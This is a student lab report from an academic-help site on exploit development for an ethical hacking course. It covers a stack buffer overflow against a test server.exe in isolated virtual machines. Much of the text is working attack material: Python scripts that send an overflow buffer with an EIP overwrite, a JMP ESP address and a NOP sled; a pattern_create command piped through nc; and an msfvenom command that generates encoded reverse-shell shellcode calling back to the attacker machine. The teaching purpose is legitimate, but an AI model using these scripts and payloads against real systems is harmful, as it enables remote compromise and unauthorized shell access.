PricingBlogAbout Us

ECU CSI5208 Ethical Hacking: Exploit Development Technical Outline

Verified

Added on  2023/06/04

|5
|533
|348
Report
AI Summary
This report provides a technical outline of exploit development within the context of an ethical hacking workshop. The process begins with setting up the environment, including Kali and Win32 Buffer Victim virtual machines, configured for NAT networking. The initial phase focuses on identifying a buffer overflow vulnerability by sending a large buffer to the target application (server.exe) and observing the EIP register. The report then details weaponizing the vulnerability by determining the offset to overwrite EIP, finding a suitable JMP ESP address, and generating shellcode using Metasploit. The shellcode is designed to establish a reverse TCP connection back to the attacker's machine, ultimately leading to system compromise. The report concludes by emphasizing the importance of understanding exploit development techniques for both offensive and defensive security purposes. Desklib provides comprehensive resources for students, including similar solved assignments and past papers.
Document Page
Exploit development is conducted to gaining control over a computer system while taking
advantages of the bugs and vulnerability allowing privilege escalation or a denial of service
attack. The development process contains several phases and need to complete the previous one
to move further.
Initiation phase: the whole development process was conducted on Linux platform. Firstly,
Win32 buffer victim virtual machine needs to be opened after opening the Kali virtual machine.
These two virtual machines need to be set to NAT networking while checking the iP address of
both machines.
Overflow:
#!/usr/bin/python
import sys
import os
import socket
host = sys.argv[1]
port = int(sys.argv[2])
port = int(sys.argv[2])
tabler-icon-diamond-filled.svg

Secure Best Marks with AI Grader

Need help grading? Try our AI Grader for instant feedback on your assignments.
Document Page
# Testing
buffer = "\x41"*500
s =
socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
con = s.connect((host, port))
s.send(buffer)
s.close()
In the windows host, immediate debugger needs to open and run the server.exe. the exection
process was started by pressing F9 key. Then a python file was created with the
name”arrack.py”. Python codes are attached. Then the command “python attack.py
IP_ADDRESS 1337”. The IP address is the address of the windows virtual machine. Then we
swap to the Windows environment and press shift+F9 to pass the exception to the executable.
Document Page
We can see that EIP now contains our value, as does EBP. Whilst ESP points to a region of
memory which contains our injected value.
Weaponzing the vulnerability:
In this phase, server.exe was restarted by pressing CTRL + F2 within immunity debugger.
Then the execution process was initiated by pressing F9. The directory also needs to be change
into metasploit by running running cd /usr/share/metasploit-framework/tools/exploit. Run
./pattern_create.rb -l 5000 | nc IP_ADDRESS 1337 within Kali, where IP_ADDRESS is the IP address of the
Windows VM. Then press SHIFT +F9 within Immunity debugger to pass the exception. Run
./pattern_offset.rb -l 5000 -q 37694136” within Kali to determine the offset of EIP. Now we must
determine an address for code which will jump to ESP. The attack.py modified as follows:
#!/usr/bin/python
import sys
import os
import socket
Document Page
host = sys.argv[1]
port = int(sys.argv[2])
# EIP is overwritten at 260 bytes
buffer = "\x41"*260
# Overwrite EIP with JMP ESP
buffer += "\x78\x16\xF3\x77"
# NOPSLED
buffer += "\x90"*128
# Shellcode
buffer +=
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con = s.connect((host, port))
s.send(buffer)
tabler-icon-diamond-filled.svg

Secure Best Marks with AI Grader

Need help grading? Try our AI Grader for instant feedback on your assignments.
Document Page
s.close()
Shellcode
1. Enter Kali.
2. Run the command msfvenom -p windows/shell/reverse_tcp LHOST=<KALI_IP> -e
x86/shikata_ga_nai -b '\x00\xff\x0a\x0b\x0d' -i 3 -f python where <KALI_IP> is the IP
address of the Kali virtual machine.
3. Modify the attack.py file to include the generated shellcode.
chevron_up_icon
1 out of 5
circle_padding
hide_on_mobile
zoom_out_icon
logo.png

Your All-in-One AI-Powered Toolkit for Academic Success.

  +13062052269
info@desklib.com

Available 24*7 on WhatsApp / Email

[object Object]
Unlock your academic potential

© 2024   |   Zucol Services PVT LTD   |   All rights reserved.